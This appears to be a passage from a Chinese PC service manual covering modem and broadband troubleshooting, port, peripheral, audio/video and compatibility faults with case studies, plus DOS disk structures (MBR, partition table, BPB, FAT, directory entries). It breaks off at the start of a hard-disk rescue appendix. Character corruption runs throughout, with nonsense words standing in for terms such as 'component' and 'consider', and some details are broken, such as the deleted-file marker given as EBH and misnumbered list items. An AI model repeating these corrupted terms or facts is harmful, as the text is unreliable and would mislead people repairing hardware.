A. 电话线是否正确连接，连接的电话线是否正常，用户的电话是否为分机，是否有来电提醒；
B. 拨打的电话号码是否有限制；
C. 宽带上网其网线定义是否正确，能否连通，有条件的话将机器更换环境（如：到邻居家中或回站）后再进行测试，以验证是否为连线问题；
2、 故障判断要点
1) MODEM配置检查：
A. 检查CMOS中的设置是否正确。MODEM设备是否被系统认到；
B. 软件最小系统加MODEM，检查故障现象是否消失。如消失。则是硬件之间的不兼容或资源冲突造成的故障；
C. 在设备管理器中检查MODEM驱动是否正确，是否有资源冲突。MODEM支持的协议是否与局端不兼容。在驱动不正确时，可能会造成上网掉线、上网速度慢等现象。将原MODEM驱动删除（最好在控制面板--调制解调器中将MODEM删除），安装主板驱动后重新安装MODEM驱动程序；
D. MODEM设备属性设置是否正确（如使用的连接速度等）。
2) 拨号器/拨号过程检查：
A. 检查用户所用的拨号程序，是否为第三方的软件，建议用一新建的拨号连接，拨号上网（最好能不用用户的账号），检查是否能拨号，是否报错；
B. 注意察看报错信息，初步判断故障原因（如：报680错误，是没有拨号音，678错误，是远程服务器没响应等）；
C. 用户是否有权访问Internet网络。
3) 网络属性及协议检查：
A. 如果是通过服务提供商来拨号上网的，除一定要安装IP协议外，不应对IP地址等参数进行设定。其它上网方式，应按要求进行相关的设定；
B. 使用的拨号协议是否与服务商要求的一致（如使用PPP协议等）。
4) IE检查：
A. 对于Windows 98系统，如果IE有故障，建议升级IE到5.5版本，或打补丁；
B. 检查IE属性设置是否正确，检查IE是否因上某一网站而被修改。如果临时文件过多，可造成上网后无法浏览网页（可在IE属性中删除临时文件等。关于删除的方法，见本章之后）。是否因为没有安装某些网站所必须的插件，而造成不能浏览网页。检查IE中的安全级别设置，和分级检查设置，恢复成默认值；
C. 检查是否因上某些网站，造成系统被修改（如注册表被禁用等）；
D. 检查用户的软件环境，是否由于防病毒、防火墙之类的软件，或其设置不正确，造成浏览困难。
5) 系统检查：
A. 检查系统中是否有病毒；
B. 在MSCONFIG中关掉所有启动时加载的程序，关掉所有正在运行的程序。防止软件冲突造成的无法上网；
C. 必要时重新安装操作系统进行测试。
6) 硬件检查：
A. 更换MODEM所在的插槽，重新检测MODEM并安装驱动，如果无法上网，更换MODEM测试；
B. 如果是在雷雨后出现不能拨号等现象，除检查电缆线及其上的其它设备是否损坏外，应查MODEM是否已损坏；
C. 如还不能上网，注意检查其它硬件；
7) 宽带上网如出现故障，还需检查：
A. 检查网卡驱动是否安装正确；
B. 用闭环测试网卡是否正常；
C. 根据当地实际情况将拨号属性设置正确，根据宽带上网说明重新安装拨号软件，设置各项设置；
D. 更换不同型号网卡进行测试，排除不兼容现象；
E. 联系电信局或小区网管检查网络环境或连接设备；
F. 对于自动上网的，代理服务器不要进行设置，对于早期的宽带网，需要设置IP。

  五、本类故障的判断流程
见附录一之（八）。
六、案例
案例一：
问题描述：
一客户机器采用98操作系统，在拨号上网时发现网页无法打开，但右下脚确实有链接的图标，发现无网络流量，但多拨几次后问题解决，此问题复现无规律，客户需要解释原因并证明不是机器的问题。
解决方案：客户要求给予一个合理的解释，因为机器并非无法上网，了解到这一点就应该从软件方面来伤心虑，不能一上来就换硬件，给客户感觉不好。
机器可以正常拨号说明机器的Modem硬件和驱动没有问题，但仔细观察后发现网络流量为0，说明机器并没有在网上，右下脚的链接符号可能是一种假相，使用ipconfig/all命令发现机器没有获得IP地址，为什么会有这种现象呢Ｉ诵纳能会和电信接入端有关，反复测试几次拨号上网，发现只要拨号后如果获得IP地址就一定可以上网，如果没有获得IP地址，就一定无法打开网页，客户看到这种现象后基本认可我的说法，并希望通过重新安装操作系统来看是否可以解决，通过重新安装98操作系统后问题依旧，客户已认为机器没有问题，在新的98下我为客户用另外一种方式进行测试，即用98里边的超级终端来拨号，原因是超级终端在拨号时可以看到拨号的全过程，是否可以得到IP地址，在使用超级终端拨号5－6次后发现有一次没有得到IP地址，至此客户完全信服了，正真的原因在于电信的局端，而不是在于机器本身。

  案例二：
问题描述：客户机器所装的操作系统为98，除安装Modem外，还加了一块网卡，客户机器平时使用网卡上局域网的，网卡获得IP是采用DHCP方式，但在拨号时无法拨号上网，可是有拨号音，客户要求彻底解决。
解决方案： 客户以前曾经用过Modem拨号上网，现在无法使用，情绪较激动，除了解决外还需要充分的沟通，因此处理的过程很重要。
我在测试时发现故障复现，经过和客户沟通，发现客户以前确实可以拨号上网，最近由于安装了一块网卡，局域网可以上，拨号是用不成了，从和客户的沟通后，我认为不是机器本身的问题，还是和设置及操作系统本身有关，因为在2000下别的机器上是没有此问题的。首先我将网卡屏蔽掉，然后测试拨号上网，发现故障消失，难道和网卡有关，将网卡打开，发现可以拨号上网，问题解决！怎么回事，重新启动后发现局域网上去后拨号再次出现异常，故障复现，使用超级终端拨号发现无法获得IP地址，OK，问题找到，但是什么原因造成无法获得IP地址呢Ｉ诵拇来和操作系统有关，因为2000下并无此问题，应该在98下和网卡有关，由于此局域网是采用DHCP方式，我用winipcfg将网卡IP Realse，再次拨号故障解决，总算找出了问题的所在，反复启动并释放网卡IP后拨号正常，后经和微软工程师沟通，确定95和98确实有这种问题，但2000下已经解决了此问题，至此问题圆满解决，客户表示非常认可。

案例三：
问题描述：客户自己买了一个Modem，用此Modem可以拨号163/169上网，但其却无法拨到公司的局域网上收发邮件，客户希望协助解决，虽然客户的Modem不是标配的。
解决方案：客户自己对电脑还是比较熟悉的，因此只是要求我们协助处理，查出真正的原因，所以在处理这个问题时尽量不要打开机箱，做换主板之类的操作，重点要来伤心虑兼容性。
因为可以拨到163上，无法拨到公司网上，所以我重点要看客户Modem的型号及协议，客户的Modem是国产同维的产品，支持V.90协议，客户公司
的Modem是美国3COM的产品，也支持V.90协议，首先用超级终端拨号到公司，发现出现拨号音后2秒后自动断调，没有到获得IP地址的那一步，这就说明这两个Modem出现了兼容性问题，在握手阶段出现了问题，向客户解释清楚后，客户向其单位借了一个3COM Modem，首先用拨号网络测试一切正常，再用超级终端测试发现一切正常，客户非常认可，认为我们的测试方式很有说服力。

附：在IE中删除临时文件可用以下几种办法：
1、 打开IE浏览器，在工具-internet选项中删除临时文件，清空历史记录。（对于IE无法打开的可在这项里的设置中选每次启动Internet Explorer，或将Internet临时文件夹使用的磁盘空间加大；
2、 在开始-设置-任务栏和开始菜单-开始菜单程序中选清除；
3、 在c:\windows\history目录中将历史记录删除；
4、 在c:\windowsTemporary Internet Files中删除所有文件；
5、 使用网络实铭等第三方软件进行清除。

第九章 端口与外设故障
一、定义举例
这类故障主要涉及串并口、USB端口、键盘、鼠标等设备的故障。
二、可能的故障现象
1、 键盘工作不正常、功能键不起作用；
2、 鼠标工作不正常；
3、 不能打印或在某种操作系统下不能打印；
4、 外部设备工作不正常；
5、 串口通信错误（如：传输数据报错、丢数据、串口设备识别不到等）；
6、 使用USB设备不正常（如USB硬盘带不动，不能接多个USB设备等）；
三、可能涉及的采诵宁
装有相应端口的采诵宁（如主板）、电源、连接电缆、BIOS中的设置。
四、判断要点/顺序
1、 维修前的准备
1) 准备相应端口的短路环测试制具；
2) 准备测试程序QA、AMI等--这些程序要求在DOS下运行；
3) 根据站内的资源，准备相应端口使用的电缆线，如并口、打印机线、串口线、USB线等。
2、 环境检查
1) 连接及外观检查：
A. 设备数据电缆接口是否与主机连接良好、针脚是否有弯曲、缺失、短接等现象；
B. 对于一些品牌的USB硬盘，应向用户说明最好使用外接电源以使其更好的工作；
C. 连接端口及相关控制电路是否有变形、变色现象；
D. 连接用的电缆是否与所要连接的设备匹配（如：两台机器通过串口相连，就应使用空调制解调器连接线而不能使用MODEM线等）。
2) 外设检查：
A. 外接设备的电源适配器是否与设备匹配；
B. 检查外接设备是否可加电（包括自带电源，和从主机信号端口取电）；
C. 检测其在纯DOS下是否可正常工作。如不能工作，应先检查线缆或更换外设及主板；
D. 如果外接设备有自检等功能，可先行检验其是否为完好；也可将外接设备接至其它联想机器检测。
3、 故障判断要点
1) 尽可能简化系统，无关的外设先去掉；
2) 端口设置检查（BIOS和操作系统两方面）：
A. 检查主板BIOS设置是否正确，端口是否打开，工作模式是否正确；
B. 通过更新BIOS、更换不同品牌或不同芯片组主板，测试是否存在兼容问题；
C. 检查系统中相应端口是否有资源冲突。接在端口上的外设驱动是否已安装，其设备属性是否与外接设备相适应。在设置正确的情况下，检测相应的硬件--主板等；
D. 检查端口是否可在DOS环境下使用，可通过接一外设或用下面介绍的端口检测工具检查；
E. 对于串、并口等端口，须使用相应端口的专用短路环，配以相应的检测程序（推荐使用AMI）进行检查。如果检测出有错误，则应更换相应的硬件；
F. 检查在一些应用软件中是否有不当的设置，导致一些外设在此应用下工作不正常。如：在一些应用下，设置了不当的热键组合，使某些键不能正常工作。
3) 设备及驱动程序检查：
A. 驱动重新安装时优先使用设备驱动自带的卸载程序,如Z32打印机；
B. 检查设备软件设置是否与实际使用的端口相对应，如USB打印机要设置USB端口输出；
C. USB设备、驱动、应用软件的安装顺序要严格按照使用说明操作；
D. 外设的驱动程序，最好使用较新的版本，并可到厂商的网站上去升级。

第十章 音视频类故障
一、定义举例
与多媒体播放、制作有关的软硬件故障。
二、可能的故障现象
1、 播放CD、VCD或DVD等报错、死机；
2、 播放多媒体软件时，有图像无声或无图像有声音；
3、 播放声音时有杂音，声音异常、无声；
4、 声音过小或过大，且不能调节；
5、 不能录音、播放的录音杂音很大或声音较小；
6、 设备安装异常。
三、可能涉及的采诵宁
音、视频板卡或设备、主板、内存、光驱、磁盘介质、机箱等。

四、判断要点/顺序
1、 维修前的准备
1) 除必备的维修工具外，应准备最新的设备驱动、补丁程序、主板BIOS、最新的DirectX，标准格式的音频文件（CD、WAV文件）、视频文件（VCD、DVD）；
2) 熟悉多媒体应用软件的各项设置，如WINDOWS下声音属性的设置、声卡/显卡附带应用软件的设置、视频盒/卡应用软件的设置等；
3) 有针对性的了解用户的信息，主要了解：出现故障前是否安装过新硬件、软件、重装过系统（包括一键恢复）。
2、 环境检查
1) 检查市电的电压是否在允许的范围内（220V±10%）；
2) 检查设备电源、数据线连接是否正确，插头是否完全插好，如音箱、视频盒的音/视频连线等；开关是否开启；音箱的音量是否调整到适当大小；
3) 观察用户的操作方法是否正确；
4) 检查周围使用环境，有无大功率干扰设备，如：空调、背投、大屏幕彩电、冰箱等大功率电器。如果有应与其保持相当的距离（50厘米以上）；
5) 检查主板BIOS设置是否被调整，应先将设置恢复出厂状态，特别检查CPU、内存是否被超频。
3、 故障判断要点
1) 对声音类故障（无声、噪音、单声道等），首先确认音箱是否有故障，方法：可以将音箱连接到其他音源（如录音机、随身听）上检测，声音输出是否正常，此时可以判定音箱是否有故障；
2) 检查是否由于未安装相应的插件或补丁，造成多媒体功能工作不正常；
3) 对多媒体播放、制作类故障，如果故障是在不同的播放器下、播放不同的多媒体文件均复现，则应检查相关的系统设置（如声音设置、光驱属性设置、声卡驱动及设置）。乃至检查相关的硬件是否有故障；
4) 如果是在特定的播放器下才有故障，在其他播放器下正常，应从有问题的播放器软件着手，检查软件设置是否正确，是否能支持被播放文件的格式。可以重新安装或升级软件后，看故障是否排除；
5) 如果故障是在重装系统、更换板卡、用系统恢复盘恢复系统、或使用一键恢复等情况下出现，应首先从板卡驱动安装入手检查，如驱动是否与相应设备匹配等；
6) 对于视频输入、输出相关的故障应首先检查视频应用软件采用信号制式设定是否正确，即应该与信号源（如有线电视信号）、信号终端（电视等）采用相同的制式。中国地区普遍为PAL制式；
7) 进行视频导入时，应注意视频导入软件和声卡的音频输入设置是否相符，如：软件中音频输入为MIC，则音频线接声卡的MIC口，且声卡的音频输入设置为MIC；
当仅从光驱读取多媒体文件时出现故障，如：播放DVD/VCD速度慢、不连贯等，先检查光驱的传输模式，应设为DMA方式；
9) 检查有无第三方的软件，干扰系统的音视频功能的正常使用。另外，杀毒软件会引起播放DVD/VCD速度慢、不连贯等（如瑞星等，应关闭）；
10) 软件检查
A. 检查系统中是否有病毒；
B. 声音/音频属性设置：音量的设定，是否使用数字音频等；
C. 视频设置：视频属性中分辨率和色彩深度；
D. 检查DirectX的版本，安装最新的DirectX。同时使用其提供的Dxdiag.exe程序，对声卡设备进行检查
E. 设备驱动检查：在WINDOWS下系统-设备管理中，检查多媒体相关的设备（显卡、声卡、视频卡等）是否正常，即不应存在有？或！等标识，设备驱动文件应完整。必要时，可通过卸载驱动再重新安装或进行驱动升级。对于说明书中注明必须手动安装的声卡设备，应按要求删除或直接覆盖安装（此时，不应让系统自动搜索，而是手动在设备列表中选取）；
F. 如用户曾重装过系统，可能在装驱动时没有按正确步骤操作（如重启动等），导致系统显示设备正常，但实际驱动并没有正确工作。此时应为用户重装驱动。方法可同上；
G. 用系统恢复盘恢复系统、或使用一键恢复后有时会出现系统识别的设备不是用户实际使用的设备，而且在WINDOWS下系统-设备管理中不报错，这时必须仔细核对设备名称是否与实际的设备一致，不一致则重装驱动（如：更换过可替换的主板后声卡芯片与原来的不一致）；
H. 重装驱动仍不能排除故障，应伤心虑是否有更新的驱动版本，应进行驱动升级、或安装补丁程序。
11) 硬件检查
A. 用内存检测程序检测内存部分是否有故障。伤心虑的硬件有主板和内存；
B. 首先采用替换法检查与故障直接关联的板卡、设备。声音类的问题：声卡、音箱、主板上的音频接口跳线；显示类问题：显卡；视频输入、输出类问题：视频盒/卡；
C. 当仅从光驱读取多媒体文件时出现故障，在软件设置无效时，用替换法确定光驱是否有故障；
D. 对于有噪音问题，检查光驱的音频连线是否正确安装，音箱自身是否有问题，音箱电源适配器是否有故障，及其他匹配问题等；
E. 用磁盘类故障判断方法，检测硬盘是否有故障；
F. 采用替换法确定CPU是否有故障；
G. 采用替换法确定主板是否有故障。

五、本类故障的判断流程
见附录一之（十）。
六、案例
案例一：
问题描述：用户报修同禧E5000电脑，安装的WINDOWS XP系统。用户在播放音视频文件，如VCD、CD、MP3等时，音箱里滋滋的噪音很明显。
解决方案：
一般看到此类问题，总是会先想到是音箱的问题，或者主板的声卡有问题。但是工程师先后更换音箱、主板都是故障依旧。此时维修陷入困境。
其实只要仔细观察并思伤心一下，本着先软后硬的思路去观察，问题应该能很快解决的。此案例中，由于机器本身出厂是DOS系统，WINDOWS XP是用户自己安装的，声卡驱动也是WINDOWS XP自己认的，而恰恰是XP自带的驱动出了问题，造成用户报修的问题现象。只要安装随机驱动光盘里的相应的驱动程序，问题就迎刃而解了。

案例二：
问题描述：用户购买的未来先锋722机器，自己按装了 WINDOWS 98，发现播放CD时无声音。在声音控制里已经打开了CD的控制，并且把音量调节到最大了。
解决方案：首先我们要知道这点，联想出厂预装WINDOWS XP的机器，已经不再配置光驱和声卡之间的音频线了，播放CD时都采用XP本身提供的数字音频功能直接播放。而WINDOWS 98不具备数字音频的功能。明白了这一点，用户的问题的答案也就明朗了。
告诉用户机器标配中利用WINDOWS XP的数字音频功能播放CD，所以机器没有配置光驱音频线。而WINDOWS 98不支持数字音频功能，所以会产生这样的问题。建议用户还是使用WINDOWS XP操作系统，或者自己添加一根音频线。
从这个案例不难看出，对产品配置、技术规范的了解和掌握对于我们解决用户问题是很重要的保证。

  第十一章 兼容或配合性故障
一、定义举例
这类故障主要是由于用户追加第三方软、硬件设备而引起的软、硬件故障。
这类故障，在前面的几类故障中已部分提及，因此有些故障现象可能与前面所介绍的故障判断类似，可参伤心。
二、可能的故障现象
1、 加装用户的设备或应用后，系统运行不稳定，如：死机或重启等；
2、 用户所加装的设备不能正常工作；
3、 用户开发的应用不能正常工作；
4、 用户需要的配置在联想机上不能满足（如需要加装大容量内存、需要多个串口等）。
三、可能涉及的采诵宁
所有可能的采诵宁或软件。但影响第三方应用最多的采诵宁应该是：主板、CPU、内存、显示卡，及新型接口的外设。

四、判断要点/顺序
1、 环境检查
1) 检查外加设备板卡等的制作工艺，对于工艺粗糙的板卡或设备，很易引起黑屏、电源不工作、运行不稳定的现象；
2) 检查追加的内存条是否与原内存条是同一型号。不同的型号一是会引起兼容问题，造成运行不稳定、死机等现象；另一是要注意修改BIOS中的设置；
3) 更新或追加的采诵宁，如CPU、硬盘等的技术规格是否能与其余的采诵宁兼容。过于新的采诵宁或规格较旧的采诵宁，都会与原有配置不兼容。如：较旧的采诵宁不支持电源管理，从而使系统运行时，使用这样的采诵宁就会工作不正常，或是使整个系统也不能正常工作。
2、 故障判断要点
1) 开机后应首先检查新更新的或追加的采诵宁，在系统启动前出现的配置列表中能否出现。如果不能，应检查其安装及其技术规格；
2) 如果造成无显、运行不稳定或死机等现象，应先去除更新或追加的采诵宁或设备，看系统是否恢复到正常的工作状态，并认真研读新设备、采诵宁的技术手册，了解安装与配置方法；
3) 外加的设备如不能正常安装，应查看其技术手册了解正确的安装方法、技术要求等，并尽可能使用最新版本的驱动程序。如果不能解决，应检查外加设备的质辽诵陌原系统的工作情况；
4) 检查新追加或更新采诵宁与原有采诵宁间是否存在不能共享资源的现象，即调开相应采诵宁的资源检查故障是否消失，在不能调开时，可设法更换安装的插槽位置，或在BIOS中更改资源的分配方式；
5) 检查是否由于BIOS的原因造成了兼容性问题，这可通过更新BIOS来检查（注不一定是最新版或更高版本，可以降低版本检查）；
6) 查看追加的采诵宁上的跳线设置是否恰当，并进行必要的设置修改；
7) 对于使用较旧的板卡或软件，应注意是否由于速度上的不匹配而引起工作不正常；
通过更改系统中的设置或服务，来检查故障是否消失。如电源管理服务、设备参数修改等；
9) 检查原有的软硬件是否存在性能不佳的情况，即通过更换硬件或屏蔽原有软件来检查。

硬盘的DOS管理结构
1.磁道，扇区，柱面和磁头数
    硬盘最基本的组成部分是由坚硬金属材料制成的涂以磁性介质的盘片，不同容量硬盘的盘片数不等。每个盘片有两面，都可
记录信息。盘片被分成许多扇形的区域，每个区域叫一个扇区，每个扇区可存储128×2的N次方（N＝0.1.2.3）字节信息。在DOS
中每扇区是128×2的2次方＝512字节，盘片表面上以盘片中心为圆心，不同半径的同心圆称为磁道。硬盘中，不同盘片相同半径
的磁道所组成的圆柱称为柱面。磁道与柱面都是表示不同半径的圆，在许多场合，磁道和柱面可以互换使用，我们知道，每个磁
盘有两个面，每个面都有一个磁头，习惯用磁头号来区分。扇区，磁道（或柱面）和磁头数构成了硬盘结构的基本参数，帮这些
参数可以得到硬盘的容量，基计算公式为：
存储容量＝磁头数×磁道（柱面）数×每道扇区数×每扇区字节数
要点：（1）硬盘有数个盘片，每盘片两个面，每个面一个磁头
      （2）盘片被划分为多个扇形区域即扇区
      （3）同一盘片不同半径的同心圆为磁道
      （4）不同盘片相同半径构成的圆柱面即柱面
      （5）公式：　存储容量＝磁头数×磁道（柱面）数×每道扇区数×每扇区字节数
      （6）信息记录可表示为：××磁道（柱面），××磁头，××扇区

  2.簇
    簇是DOS进行分配的最小单位。当创建一个很小的文件时，如是一个字节，则它在磁盘上并不是只占一个字节的空间，
而是占有整个一簇。DOS视不同的存储介质（如软盘，硬盘），不同容量的硬盘，簇的大小也不一样。簇的大小可在称为磁盘
参数块（BPB）中获取。簇的概念仅适用于数据区。
本点：（1）簇是DOS进行分配的最小单位。
      （2）不同的存储介质，不同容量的硬盘，不同的DOS版本，簇的大小也不一样。
      （3）簇的概念仅适用于数据区。

3.扇区编号定义：绝对扇区与DOS扇区
    由前面介绍可知，我们可以用柱面/磁头/扇区来唯一定位磁盘上每一个区域，或是说柱面/磁头/扇区与磁盘上每一个扇区有
一一对应关系，通常DOS将柱面/磁头/扇区这样表示法称为绝对扇区表示法。但DOS不能直接使用绝对扇区进行磁盘上的
信息管理，而是用所谓相对扇区或DOS扇区。相对扇区只是一个数字，如柱面140，磁头3，扇区4对应的相对扇区号
为2757。该数字与绝对扇区柱面/磁头/扇区具有一一对应关系。当使用相对扇区编号时，DOS是从柱面0，磁头1，扇区1开始
（注：柱面0，磁头0，扇区1没有DOS扇区编号，DOS下不能访问，只能调用BIOS访问），第一个DOS扇区编号为0，该磁道上剩余
的扇区编号为1到16（设每磁道17个扇区），然后是磁头号为2，柱面为0的17个扇区，形成的DOS扇区号从17到33。直到该柱面的
所有磁头。然后再移到柱面1，磁头1，扇区1继续进行DOS扇区的编号，即按扇区号，磁头号，柱面号（磁道号）增长的顺序连续
地分配DOS扇区号。
公式：记DH－－第一个DOS扇区的磁头号
        DC－－第一个DOS扇区的柱面号
        DS－－第一个DOS扇区的扇区号
        NS－－每磁道扇区数
        NH－－磁盘总的磁头数
      则某扇区（柱面C，磁头H，扇区S）的相对扇区号RS为：
RS＝NH×NS×（C－DC）＋NS×（H－DH）＋（S－DS）
      若已知RS，DC，DH，DS，NS和NH则
S＝（RS　MOD　NS）＋DS
H＝（（RS　DIV　NS）MOD　NH）＋DH
C＝（（RS　DIV　NS）DIV　NH）＋DC
要点：（1）以柱面/磁头/扇区表示的为绝对扇区又称物理磁盘地址
      （2）单一数字表示的为相对扇区或DOS扇区，又称逻辑扇区号
      （3）相对扇区与绝对扇区的转换公式
   4.DOS磁盘区域的划分
    格式化好的硬盘，整个磁盘按所记录数据的作用不同可分为主引导记录（MBR:Main Boot Record），Dos引导记录（DBRos
Boot Record），文件分配表（FAT:File Assign Table），根目录（BD:Boot Directory）和数据区。前5个重要信息在磁盘的外
磁道上，原因是外圈周长总大于内圈周长，也即外圈存储密度要小些，可伤心性高些。
要点：（1）整个硬盘可分为MBR，DBR，FAT，BD和数据区。
      （2）MBR，DBR，FAT，和BD位于磁盘外道。

5.MBR
    MBR位于硬盘第一个物理扇区（绝对扇区）柱面0，磁头0，扇区1处。由于DOS是由柱面0，磁头1，扇区1开始，故MBR不属于
DOS扇区，DOS不能直接访问。MBR中包含硬盘的主引导程序和硬盘分区表。分区表有4个分区记录区。记录区就是记录有关分区信
息的一张表。它从主引导记录偏移地址01BEH处连续存放，每个分区记录区占16个字节。
分区表的格式
分区表项的偏移 意义 　　占用字节数
      00 引导指示符 1B
      01 分区引导记录的磁头号 1B
      02 分区引导记录的扇区和柱面号 2B
      04 系统指示符 1B
      05 分区结束磁头号 1B
      06 分区结束扇区和柱面号 2B
      08 分区前面的扇区数 4B
      0C 分区中总的扇区数 4B
4个分区中只能有1个活跃分区，即C盘。标志符是80H在分区表的第一个字节处。若是00H则表示非活跃分区。例如：
80　01　01　00　0B FE 3F 81 3F 00 00 00 C3 DD 1F 00
00 00 01 82 05 FE BF 0C 02 DE 1F 00 0E 90 61 00
00　00　00　00　00　00　00　00　00　00　00　00　00　00　00　00
00　00　00　00　00　00　00　00　00　00　00　00　00　00　00　00
要点：（1）MBR位于硬盘第一个物理扇区柱面0，磁头0，扇区1处。不属于DOS扇区，
      （2）主引导记录分为硬盘的主引导程序和硬盘分区表。
6.DBR
    DBR位于柱面0，磁头1，扇区1，即逻辑扇区0。DBR分为两部分：DOS引导程序和BPB（BIOS参数块）。其中DOS引导程序完成
DOS系统文件（IO.SYS，MSDOS.SYS）的定位与装载，而BPB用来描述本DOS分区的磁盘信息，BPB位于DBR偏移0BH处，共13字节。
它包含逻辑格式化时使用的参数，可供DOS计算磁盘上的文件分配表，目录区和数据区的起始地址，BPB之后三个字提供物理格
式化（低格）时采用的一些参数。引导程序或设备驱动程序根据这些信息将磁盘逻辑地址（DOS扇区号）转换成物理地址（绝对
扇区号）。BPB格式
序号 偏移地址 意义
1 03H－0AH OEM号
2 0BH－0CH 每扇区字节数
3 0DH 每簇扇区数
4 0EH－0FH 保留扇区数
5 10H FAT备份数
6 11H－12H 根目录项数
7 13H－14H 磁盘总扇区数
8 15H 描述介质
9 16H－17H 每FAT扇区数
10 18H－19H 每磁道扇区数
11 1AH－1BH 磁头数
12 1CH－1FH 特殊隐含扇区数
13 20H－23H 总扇区数
14 24H－25H 物理驱动器数
15 26H 扩展引导签证
16 27H－2AH 卷系列号
17 2BH－35H 卷标号
18 36H－3DH 文件系统号
DOS引导记录公式：
文件分配表≡保留扇区数
根目录≡保留扇区数＋FAT的个数×每个FAT的扇区数
数据区≡根目录逻辑扇区号＋（32×根目录中目录项数＋（每扇区字节数－1））DIV每扇区字节数
绝对扇区号≡逻辑扇区号＋隐含扇区数
扇区号≡（绝对扇区号MOD每磁道扇区数）＋1
磁头号≡（绝对扇区号DIV每磁道扇区数）MOD磁头数
磁道号≡（绝对扇区号DIV每磁道扇区数）DIV磁头数
要点：（1）DBR位于柱面0，磁头1，扇区1，其逻辑扇区号为0
      （2）DBR包含DOS引导程序和BPB。
      （3）BPB十分重要，由此可算出逻辑地址与物理地址。

  7.文件分配表
    文件分配表是DOS文件组织结构的主要组成部分。我们知道DOS进行分配的最基本单位是簇。文件分配表是反映硬盘上所
有簇的使用情况，通过查文件分配表可以得知任一簇的使用情况。DOS在给一个文件分配空间时总先扫描FAT，找到第一个可
用簇，将该空间分配给文件，并将该簇的簇号填到目录的相应段内。即形成了簇号链。FAT就是记录文件簇号的一张表。
FAT的头两个域为保留域，对FAT12来说是3个字节，FAT来说是4个字节。其中头一个字节是用来描述介质的，其余字节为FFH
。介质格式与BPB相同。
第一个字节的8位意义：
7　6　5　4　3　２　１ ０
└─────-┘ │ │ │┌0非双面
置1 │ │ └┤
│ │ └1双面
│ │┌0不是8扇区
│ └┤
│ └1是8扇区
│┌0不是可换的
└┤
└1是可换的
FAT结构含义
FAT12 FAT16 意义
000H 0000H 可用
FF0H－FF6H FFF0H－FFF6H 保留
FF7H FFF7H 坏
FF8H－FFFH FFF8H－FFFFH 文件最后一个簇
×××H ××××H 文件下一个簇
对于FAT16，簇号×2作偏移地址，从FAT中取出一字即为FAT中的域。
逻辑扇区号＝数据区起始逻辑扇区号＋（簇号－2）×每簇扇区数
簇号＝（逻辑扇区号－数据区起始逻辑扇区号）DIV每簇扇区数＋2
要点：（1）FAT反映硬盘上所有簇的使用情况，它记录了文件在硬盘中具体位置（簇）。
      （2）文件第一个簇号（在目录表中）和FAT的该文件的簇号串起来形成文件的簇号链，恢复被破坏的文件就是根
据这条链。
      （3）由簇号可算逻辑扇区号，反之，由逻辑扇区号也可以算出簇号，公式如上。
      （4）FAT位于DBR之后，其DOS扇区号从1开始。

8.文件目录
    文件目录是DOS文件组织结构的又一重要组成部分。文件目录分为两类：根目录，子目录。根目录有一个，子目录可以有
多个。子目录下还可以有子目录，从而形成树状的文件目录结构。子目录其实是一种特殊的文件，DOS为目录项分配32字
节。目录项分为三类：文件，子目录（其内容是许多目录项），卷标（只能在根目录，只有一个。目录项中有文件（或子目
录，或卷标）的名字，扩展名，属性，生成或最后修改日期，时间，开始簇号，及文件大小。
目录项的格式
字节偏移 意义 占字节数
00H 文件名 8B
08H 扩展名 3B
0BH 文件属性 1B
0CH 保留 10B
16H 时间 2B
18H 日期 2B
1AH 开始簇号 2B
1CH 文件长度 4B
目录项文件名区域中第一个字节还有特殊的意义：00H代表未使用
05H代表实际名为E5H
EBH代表此文件已被删除
目录项属性区域的这个字节各个位的意义如下： ７　６　５　４　３　２　１　０
                                           未　修　修　子　卷　系　隐　只
                                           用　改　改　目　标　统　藏　读
                                               标　标　录　　　属　属　属
                                               志　志　　　　　性　性　性
注意：WINDOWS的长文件名使用了上表中所说的保留这片区域。
要点：（1）文件目录是记录所有文件，子目录名，扩展名属性，建立或删除最后修改日期。文件开始簇号及文件长度的一张
           登记表.
      （2）DOS中DIR列出的内容训是根据文件目录表得到的。
      （3）文件起始簇号填在文件目录中，其余簇都填在FAT中上一簇的位置上。

第三部分--附录
每个用户的硬盘中都存放着大量的有用数据，而硬盘又是一个易出毛病的采诵宁。为了有效的保存硬盘中的数据，除了有效的保存硬盘中的数据，备份工作以外，还要学会在硬盘出现故障时如何救活硬盘，或者提取其中的有用数据，把损失降到最小程度。
1、系统不承认硬盘
此类故障比较常见，即从硬盘无法启动，从A盘启动也无法进入C盘，使用CMOS中的自动监测功能也无法发现硬盘的存在。这种故障大都出现在连接电缆或IDE口端口上，硬盘本身的故障率很少，可通过重新插拔硬盘电缆或者改换IDE口及电缆等进行替换试验，可很快发现故障的所在。如果新接上的硬盘不承认，还有一个常见的原因就是硬盘上的主从条线，如果硬盘接在IDE的主盘位置，则硬盘必须跳为主盘状，跳线错误一般无法检测到硬盘。

2、CMOS引起的故障
CMOS的正确与否直接影响硬盘的正常使用，这里主要指其中的硬盘类型。好在现在的机器都支持IDEautodetect的功能，可自动检测硬盘的类型。当连接新的硬盘或者更换新的硬盘后都要通过此功能重新进行设置类型。当然，现在有的类型的主板可自动识别硬盘的类型。当硬盘类型错误时，有时干脆无法启动系统，有时能够启动，但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量，则硬盘后面的扇区将无法读写，如果是多分区状态则个别分区将丢失。还有一个重要的故障原因，由于目前的IDE都支持逻辑参数类型，硬盘可采用Normal、LBA、Large等。如果在一般的模式下安装了数据，而又在CMOS中改为其他的模式，则会发生硬盘的读写错误故障，因为其物理地质的映射关系已经改变，将无法读取原来的正确硬盘位置。

  3、主引导程序引起的启动故障
硬盘的主引导扇区是硬盘中的最为敏感的一个采诵宁，其中的主引导程序是它的一部分，此段程序主要用于检测硬盘分区的正确性，并确定活动分区，负责把引导权移交给活动分区的DOS或其他操作系统。此段程序损坏将无法从硬盘引导，但从软区或光区之后可对硬盘进行读写。修复此故障的方法较为简单，使用高版本DOS的fdisk最为方便，当带参数/mbr运行时，将直接更换(重写)硬盘的主引导程序。实际上硬盘的主引导扇区正是此程序建立的，fdisk.exe之中包含有完整的硬盘主引导程序。虽然DOS版本不断更新，但硬盘的主引导程序一直没有变化，从DOS3.x到目前有winDOS95的DOS，所以只要找到一种DOS引导盘启动系统并运行此程序即可修复。

4、分区表错误引导的启动故障
